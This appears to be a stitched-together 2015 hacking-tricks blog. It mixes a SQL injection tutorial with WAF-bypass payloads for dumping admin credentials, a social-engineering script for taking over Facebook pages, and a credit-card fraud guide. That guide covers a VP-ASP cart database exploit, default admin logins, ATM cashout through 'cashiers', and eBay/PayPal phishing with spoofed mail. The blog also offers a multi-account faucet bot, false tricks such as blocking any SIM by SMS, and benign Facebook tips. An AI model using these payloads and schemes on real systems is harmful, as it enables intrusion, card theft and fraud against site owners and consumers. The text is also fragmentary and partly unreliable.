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Saturday, 30 May 2015

Block Any World simcard By One Message

Posted by SyedMohd on 
yes , its right
just goto create new message then write

example you want to block this mble number sim 919876543210

then write

change 91987654321 to any world mble number with country code...
and send it to that same number
when it will open msg , sim will block

I know this will copy on many blog but no problem enjoy and daily visit for more tricks.

Activity: 98

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January 21, 2014, 09:15:24 AM

Hello everyone!

This bot for freebitco.in can be used to FREE ROLL and not forget about your free Bitcoins.
Unfortunately it doesn't solve captcha automatically :|

All you have to do is:
1. Get a new bitcoin address (local or web wallet) It doesn't work with already registered addresses

2. Download zip file and extract it:
links cand be found here: http://www.4shared.com/postDownload/zHVbiOcace/freebitco.html
3. Start freebitco.exe and for the first time pick 0
freebitco.exe is a python scrypt compiled with py2exe.exe

4. Now you can register as many addresses you want and start earning

After you will register your first address you will be prompted to login and to solve one captcha image.
Then a new captcha for free roll will be required. - The free roll is done automatically after solving captcha.
Now the program enters in a wait loop  (60 minutes) and will prompt you for a new captcha when countdown expires to earn more BTC

This program will create a folder res near it. Do not delete it - there it keeps the cookies and registered accounts with this BOT.

It has the ability to use multiple adresses and to use different proxy list for each address.
All you have to do is run the program, register as many addresses as you want and in 'res' folder modify <address>.proxylist file - if you want different IP addresses.

You can give a different proxy list for each address, that way you can earn on multiple addresses at the same time.

Example <address>.proxylist file:

Have fun and enjoy your profit Smiley

Please leave some feedback here!

Thursday, 28 May 2015

New trick to break nokia password
Just go here http://nfader.su/
And put iemi number then u got master key of nokia mobile
Enjoy and share

Sunday, 24 May 2015

anyone can contact me
Note : Your phone will also be
reset so your previous back up is
must. Also remove your sim card

Step 1: From the lock screen,
press the
power button or remove the
then put it back if you can’t
turn off
the phone from the lock screen.
off your phone).

2. Press Home, Power, and
Volume up
keys all together for 3 to 5
This will take you to the
system recovery”

3. Navigate through the options
the volume keys and select
data/Factory Reset” using the

4. Navigate through the options
using the volume keys and
“Wipe Cache Partition” using the

5. Finally, select reboot phone.
Now You need to set up your
phone again,
but if you had a back up before,
should be easy.

I already tried this one and it

trick also worked for you guys.
Thanks and happy androiding!

Saturday, 23 May 2015


Friday, 22 May 2015

Union based Sql with WAF Bypass

  • Union based SQL injection + WAF Bypassing By

Today i m Going To Discuss About Union based SQL
injection And WAF Bypassing Techniques.
Lets Start Injecting.

Here Is Our Target .

Add Single Quote (') at the End Of The URL .


And Get MYSQL Error.
Lets Balance Our Query for Further Injecting.
Some Comments from our Previous Tutorials.



http://www.targetsite.com/news.php?id=11-- -



Here Is A Small Explanation on Balance and Comment
in our Injection.
After Balancing Our Query . Next is Count Total Number
Of Columns

http://www.targetsite.com/news.php?id=11 order by
No Error !

http://www.targetsite.com/news.php?id=11 order by
No Error!

http://www.targetsite.com/news.php?id=11 order by
Again No Error !

http://www.targetsite.com/news.php?id=11 order by

Here We Get Error !
Unknown column '6' in 'order clause'
Now Try To Find Our Vulnerable Columns.

http://www.targetsite.com/news.php?id=-11 Union
Select 1,2,3,4,5--+

If Our Target site Is Protected with WAF . WAF Will
Block Our Query and Give Us Mod_Security Error.
So Here some WAF Bypassing Methods.

/*!%55NiOn*/ /*!%53eLEct*/
%55nion(%53elect 1,2,3)-- -
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#1q%0AuNiOn all#qa%0A#
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!uNIOn*/ /*!SelECt*/

Just Change The Union Select With Following Bypass
Lets Continue Our Tutorial.

Now Check The Vulnerable Columns.we Use ( - ) for
Finding Vulnerable columns.
We Can Also Check Vulnerable Columns with Other
methods instead of Just Using (-).

Here Are Some Vulnerable Columns Checking Methods
With Examples.

Using And 0
http://www.targetsite.com/news.php?id=11 and 0
Union Select 1,2,3,4,5--+

Using And False
http://www.targetsite.com/news.php?id=11 and false
Union Select 1,2,3,4,5--+

Using Div 0
http://www.targetsite.com/news.php?id=11 Div 0
Union Select 1,2,3,4,5--+

Using null
http://www.targetsite.com/news.php?id=null Union
Select 1,2,3,4,5--+

Using .1337
http://www.targetsite.com/news.php?id=11.1337 Union
Select 1,2,3,4,5--+

http://www.targetsite.com/news.php?id=-11 Union
Select 1,2,3,4,5--+

We Will Get Our Vulnerable Columns Printed On The
Page.3 is Our Vulnerable Column.
Here Are Some Variables Of MYSQL.
@@version = Current Version
@@GLOBALVERSION = Current Version
User() = Current User
Database = Current Database

http://www.targetsite.com/news.php?id=-11 Union
Select 1,2,@@version,4,5--+

We Can See Current Version Printed on the Page.
Next Step Is To Get The Tables.

http://www.targetsite.com/news.php?id=-11 Union
Select 1,2,concat(table_name),4,5 from
information_schema.tables where

We can See Total Tables in Our Primary Database.
Now if you Want To Get Admin Details Of The Target
Site check the Table name of Admin.
then encode admin table name in MYSQL Char() to get
The Columns in the Admin Table.Change table_name to
column_name,information_schema.tables to
information_schema.columns and Table_schema to
Table_name.And Replace Database() with our MYSQL
Char() admin value.

http://www.targetsite.com/news.php?id=-11 Union
Select 1,2,concat(column_name),4,5 from
information_schema.columns where table_name=CHAR
(97, 100, 109, 105, 110)--+

we can see the Column Names on Page . like
to Get The Data From columns here is our final Query.

http://www.targetsite.com/news.php?id=-11 Union
Select 1,2,concat(username,0x3a,password),4,5 from

Author: Syedmohd

How to Hack Facebook Admin Page

Hello guys!

After receiving a good response from my earlier post "hacking facebook account via android phone" I am posting a new trick here about How to Hack Facebook Admin Page.

Well it will tell you about a new hacking technique and also will increase your knowledge so that you may not become a victim of such hacks, But Always remember:
Note: Never use these tricks to harm any innocent, Just increase your knowledge and  we will not be responsible for any harm caused.

The purpose of this trick and hack is to attack a facebook fan page by fooling the admin by social engineering.

I saw some people becoming victim of this, So I decided to teach about How to Hack Facebook Admin Page to my loyal readers.

Don't forget to share this with friends.

Things we shall need:

1.  Hack Facebook page exploit.
2. A free hosting.
3. A key or script to run that "Facebook page hacking exploit.".
4. Your facebook email id.
5. Brain ( A bit ;) )

I will try to be simple, but if you don't get anything then kindly ask at comment below.

1. Facebook Admin Page Hacking Exploit:

a) Editing the facebook admin page hack exploit:

First of all see your facebook email id which you used to signup at facebook, see pic below that's the pic of exploit:

Now change the highlighted id to your's facebook id.

2. Get free hosting:

Well t35 and 110mb won't help you in this hack :P better go to 000webhost.com and 0fees.net.

Upload the exploit and I recommend change its name from pagehack.js to fanbooster.js or something more attracting.

3. Using the exploit by Key or script: 

There will be a text file in the downloaded package, named as Key for pagehack.txt open it, You will get a script in it, Now the main thing is social engineering, its up to you that how you give him key, Well Change the following part in the key to your own script path:
Change this to your hosting , and also change the exploit name in this key if you have changed it while uploading as suggesting.

Tip: Encode this in ASCII format, Victim might not know what is this.
Now, Give the key to victim (He must be admin of page) and ask him to paste this in browser address bar

Tip: Tell him that it will make your page safe, or something else like attracting

When he will put this key in address bar and that's it you will get a notification that you are admin of his page now.

Enjoy the Facebook Admin Page Hack, But don't hack for bad cause.

Bypass Photo verification on Fb 2015 Trick

Facbook Bypass Photo Verification Trick
Follow below given steps.
*.First go to http://bypasstunnel.com
*.Open m.facebook.com
*.Login with Blocked Account.
*.Now it will ask you for DOB or Mobile
Number Verification.
*.Verify anyone Your Account will be open.
*.Tested 100% Working.


Hi there. This is my first serious "black hat hacking" post of credit cards hacking. Here will be explained all methods used to hack credit cards and bank accounts with lots of $$ it. Now I'm sure most of you think that this is fake or scam, but i want to just tell u this is real and the only working method (in my opinion) to hack a credit card and make your wish come true (lol, hope it doesn't sound like a commercial).

This tutorial is divided in two parts.
  1. Introduction into Credit Cards
  2. Credit card Hacking

Note: Hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. This post is for educational purposes only.

Lets start with some easy terms.

What is credit card ?

Credit cards are of two types:
  • Debit Card
  • Credit Card
1. Debit means u have a sum of amount in it and u can use them.
2. Credit means u have a credit line limit like of $10000 and u can use them and by the end of month pay it to bank.

To use a credit card on internet u just not need cc number and expiry but u need many info like :
  • First name
  • Last name
  • Address
  • City
  • State
  • Zip
  • Country
  • Phone
  • CC number
  • Expiry
  • CVV2 ( this is 3digit security code on backside after signature panel )
If you get that info you can use that to buy any thing on internet, like software license, porn site membership, proxy membership, or any thing (online services usually, like webhosting, domains).

If u want to make money $ through hacking then you need to be very lucky... you need to have a exact bank and bin to cash that credit card through ATM machines.

Let me explain how ?

First study some simple terms.

BINS = first 6 digit of every credit card is called " BIN " (for example cc number is : 4121638430101157 then its bin is " 412163 "), i hope this is easy to understand.

Now the question is how to make money through credit cards. Its strange..., well you cant do that, but there is specific persons in world who can do that. They call them selves " cashiers ". You can take some time to find a reliable cashiers.

Now the question is every bank credit cards are cashable and every bin is cashable? Like citibank, bank of america , mbna .. are all banks are cashables ? Well answer is " NO ". If u know some thing, a little thing about banking system, have u ever heard what is ATM machines? Where u withdraw ur cash by putting ur card in.
Every bank don't have ATM, every bank don't support ATM machines cashout. Only few banks support with their few bins (as u know bin is first 6 digit of any credit / debit card number), for suppose bank of america. That bank not have only 1 bin, that bank is assigned like, 412345 412370 are ur bins u can make credit cards on them. So bank divide the country citi location wise, like from 412345 - 412360 is for americans, after that for outsiders and like this. I hope u understand. So all bins of the same bank are even not cashable, like for suppose they support ATM in New York and not in California, so like the bins of California of same bank will be uncashable. So always make sure that the bins and banks are 100% cashable in market by many cashiers.

Be sure cashiers are legit, because many cashiers r there which take your credit card and rip u off and don't send your 50% share back.
You can also find some cashiers on mIRC *( /server irc.unixirc.net:6667 ) channel : #cashout, #ccpower

Well, check the website where u have list of bins and banks mostly 101% cashable. If u get the credit card of the same bank with same bin, then u can cashout otherwise not . Remember for using credit card on internet u don't need PIN ( 4 words password which u enter in ATM Machine ), but for cashout u need. You can get pins only by 2nd method of hacking which i still not post but i will. First method of sql injection and shopadmin hacking don't provide with pins, it only give cc numb cvv2 and other info which usually need for shopping not for cashing.

Credit Card Hacking

CC (Credit Cards) can be hacked by two ways:
  • Credit Card Scams ( usually used for earning money , some times for shopping )
  • Credit Card Shopadmin Hacking ( just for fun, knowledge, shopping on internet )
1. Shopadmin Hacking 

This method is used for testing the knowledge or for getting the credit card for shopping on internet, or for fun, or any way but not for cashing ( because this method don't give PIN - 4 digit passcode ) only gives cc numb , cvv2 and other basic info.

Shopadmins are of different companies, like: VP-ASP , X CART, etc. This tutorial is for hacking VP-ASP SHOP.

I hope u seen whenever u try to buy some thing on internet with cc, they show u a well programmed form, very secure. They are carts, like vp-asp xcarts. Specific sites are not hacked, but carts are hacked.

Below I'm posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked, and through their *mdb file u can get their clients 'credit card details', and also login name and password of their admin area, and all other info of clients and comapny secrets.

Lets start:

Type: VP-ASP Shopping Cart
Version: 5.00

How to find VP-ASP 5.00 sites?

Finding VP-ASP 5.00 sites is so simple...

1. Go to google.com and type: VP-ASP Shopping Cart 5.00
2. You will find many websites with VP-ASP 5.00 cart software installed

Now let's go to the exploit..

The page will be like this: ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is: diag_dbtest.asp
Now you need to do this: ****://***.victim.com/shop/diag_dbtest.asp

A page will appear contain those:
  • xDatabase
  • shopping140
  • xDblocation
  • resx
  • xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe r

The most important thing here is xDatabase
xDatabase: shopping140

Ok, now the URL will be like this: ****://***.victim.com/shop/shopping140.mdb

If you didn't download the Database, try this while there is dblocation:
the url will be: ****://***.victim.com/shop/resx/shopping140.mdb

If u see the error message you have to try this :

Download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com, or use MS Office Access.
Inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website.

The admin login page is usually located here: ****://***.victim.com/shop/shopadmin.asp

If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords which are:
Username: admin
password: admin
Username: vpasp
password: vpasp

2. Hacking Through Scams

This method is usually used to hack for earning money. What happens in this method is you create a clone page.

Target: its basically eBay.com or paypal.com for general credit cards, or if u want to target any specific cashable bank like regionbank.com then u have to create a clone page for that bank.

What is eBay.com?

Its a shopping site world wide which is used by many of billion people which use their credit cards on ebay. What you do make a similar page same as eBay and upload it on some hosting which don't have any law restrictions, try to find hosting in Europe they will make your scam up for long time, and email the users of eBay.

How to get the emails of their users?

Go to google.com and type "Email Harvestor" or any Email Spider and search for eBay Buyers and eBay Sellers and u will get long list. That list is not accurate but out of 1000 atleast 1 email would be valid. Atleast you will get some time.

Well u create a clone page of ebay, and mail the list u create from spider with message, like "Your account has been hacked" or any reason that looks professional, and ask them to visit the link below and enter your info billing, and the scam page have programming when they enter their info it comes directly to your email.
In the form page u have PIN required so u also get the PIN number through which u can cash through ATM ..

Now if u run ebay scam or paypal scam, its up to your luck who's your victim. A client of bank of america or of citibank or of region, its about luck, maybe u get cashable, may be u don't its just luck, nothing else.

Search on google to download a scam site and study it !

After you create your scam site, just find some email harvestor or spider from internet (download good one at Bulk Email Software Superstore - Email Marketing Internet Advertising) and create a good email list.

And you need to find a mailer (mass sending mailer) which send mass - emails to all emails with the message of updating their account on ur scam page ). In from to, use email eBay@reply3.ebay.com and in subject use :eBay - Update Your eBay Account and in Name use eBay

Some Instructions:

1. Make sure your hosting remains up or the link in the email u will send, and when your victim emails visit it, it will show page cannot be displayed, and your plan will be failed.
2. Hardest point is to find hosting which remains up in scam. even i don't find it easily, its very very hard part.
3. Maybe u have contacts with someone who own hosting company and co locations or dedicated he can hide your scam in some of dedicated without restrictions.
4. Finding a good email list (good means = actually users)
5. Your mass mailing software land the emails in inbox of users.

That's all folks. Hope you will find this tutorial useful. And remember, hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. 
Changing fonts on Facebook status:
Change Facebook status font
And I’m saving the best for the last. By default your status update have only one font, but you can always use 3rd party service to change the font of your status update. Here is a cool websitewhich you can use to change font for your Facebook status updates.
I hope you have enjoyed all Fb tricks mentioned above. We will keep sharing more cool Facebook tips in future, don’t forget to join us on Facebook.

Latest Facebook Tricks 2015 – Best Tips

Facebook a Social networking website from whom no one is unknown these days.  It allows you to connect with anyone all around the Globe and Chat with them, Share Videos & movies and many more. As everyone know How to basic things on Facebook, Here we will Share some of the Latest Working Facebook Tricks which make your facebooking more interesting. There Tricks are well researched by our team all Tricks working. So let’s Go through these tricks once and use in your facebook account.
facebook tricks 2014

1.Trick to update blank status:

Now you can update your Facebook status as blank.first login to your Facebook account.
  • now enter @[3:3: ] in your status box
  • if you want to update your blank status as long statement the paste the code again below the code just like below
                                         @[3:3: ]
                                         @[3:3: ]
                                         @[3:3: ]
                                         @[3:3: ]

2.Post animated (.gif) images on Facebook:

Many other Social networking websites like Google plus allows you to Share animated gif’s images which really looks pretty Cool, but if your daily Facebook you would be knowing that gif images are not allowed on FB. Don’t worry here is the trick to Post gif images on Facebook:-
  • Simple visit giphy website.
  • Now select a animated gif image which you want to post on FB.
  • Paste the image the link on Facebook Status and Voila its done !!

3.Invite all friends to Like a FB page with Single Click

You created a new Facebook Fan page but don’t have any likes on it. The best way to get Likes is to invite your all friends to like a Facebook page, but inviting your each friend manually takes a hell lot of time. But you can use the this Latest trick to invite all friends to like facebook page by a Single Click
  • LogIn to your Facebook account and Open the Page for which you want to send invitations to your Friends.
  • Now Click on Invite friends Option and a pop up will appear.
  • Now simply press f12 key from your Keyboard and Chrome Console window will Open.
  • Copy the below posted Code and paste it in the Console window and you’re done !!
var inputs = document.getElementsByClassName(‘uiButton _1sm’); for(var i=0; i<inputs.length;i++) { inputs[i].click(); }

4.Download facebook photo Album in a single click:

now you can download  facebook photo album with a single click,all you need is to just go to app namedFacebook2zip.com
check the process:
  • Step1: As soon as go the above app you are asked to Login with facebook just like in above picture
  • Step2: Now choose your friend from whom you want to download photo album you can see an arrow 2 pointing in the above picture
  • Step3: Now choose the album what you want to download
  • Step4: Just click Download button and save photo album to your desired location.

5.Post and Create Fake Facebook Status:

Now amaze your friends by posting Fake Status on your FB profile with anyone’s name whether it is Bill Gates to Mark Zuckerbergs. Just follow below simple instructions:-
fake fb status
  • Visit  The Wall Machine website.
  • And Connect it with your Facebook profile and Log in to it.
  • Now you’ll able to create any kind of Fake Fb Status and post on your profile.

6.Create a Video with your Facebook pictures:

now can create a video with your facebook pictures it is so easy you can go to pixable.com and login with your facebook account.

7.Find who unfriend you on facebook:

  • If you think that someone of your friends has Unfriend you on Facebook and your not able to find who is that.
  • Now you can use this Application to find the one who removed or deleted you from your Profile.

8.Post your staus in all facebook groups at once:

  • it is easy to post your status on your wall.when comes you have to post status in all groups it takes much time and even it is hard task.by using simple app it is easy you can post in all facebook groups at once
  • Go to Multi post application and login with Facebook.
  • you can also use another app click here

9.Sync Facebook Calendar with Google Calendar:

If you have been using Fb calendar as well as Google Calendar I’m sure it had been created a big mess to manage your important reminders, appointments and birthday. But now below we have showed How to Sync Facebook Calendar with Google Calendar:-
  • Open your facebook and Simply go to Events and head towards Calendar tab.
  • Now just Tap on setting and Click on the export button.
  • Now you have to Choose what you want to export “Friends birthday” or “upcoming events” select one which is appropriate to you and then Copy their link address.
  • LogIn to your Google account and visit Google Calendar page.
  • Now Simply Click on Other Calendars and tap on the drop down button and then Choose Add by URL.
  • Here you’ll paste the link which got from the FB calendar and Click on Add Calendar button.

 10.Send Photos In chat box:

11.How to Delete/deactivate Facebook account?

  • Most of people think that deactivating and deleting are same but in practical they are different.
  • click here how we can delete/deactivate facebook account.

12. Accept all friend request at once

  • Login to your FB account and visit your Friend request page.
  • Now Copy the below Code and Post it your friend request page address bar.
javascript:for( i = 1;i<document.getElementsByName(“actions[accept]”).length;i++){document.getElementsByName(“actions[accept]”)[i].click();}void(0);
  • And press enter…That’s it !! Now check all your friends would be added to your friend list.

13. Restore deleted Facebook Messages and Images

  • Simple Login to your facebook account and head towards general setting page through this link.
  • Now Click on Download a Copy of your Facebook Data
  • At the very next page a Download archieve button will be visible, Click on it and they might ask you to enter your FB password again, Just enter it.
  • When you click on Submit button and you will see download link for your data will be sent to your email id.
  • Now log in to your mail account and download the archive from the link which you received in your mail.
  • That’s it..!! Extract or Unzip the file and there would all information of your FB account such as messages, image, videos, etc.

14.Cool Facebook Chat tricks:

  • Send your Friends Cool messages in different Style like Upside down or flipped text and many more.
  • Visit this website from your Computer browser.
  • Now here type your desired text in dialog box and choose appropriate style.
  • Now Simple Copy the text and post it to FB status and it will appear in different style.

15. Visible Online for Whom You want:

Now you can visible online for whom you want.By using this trick you can chat with only with the persons whom you want.
  • Just go to Advanced chat settings by clicking on Gear icon below chat bar.
  • Then a pop up arises  just like below screen capture
  • Now click Turn On chat for Some Friends
  • Now add your friends in the options
  • finally click save option.
So that’s all for this post.soon i am going to write about  best facebook tricks-part 2.stay connected with us. don’t forget to like us on Facebook. if i missed any best facebook trick let me know in the comments below.so that i will update them on my list.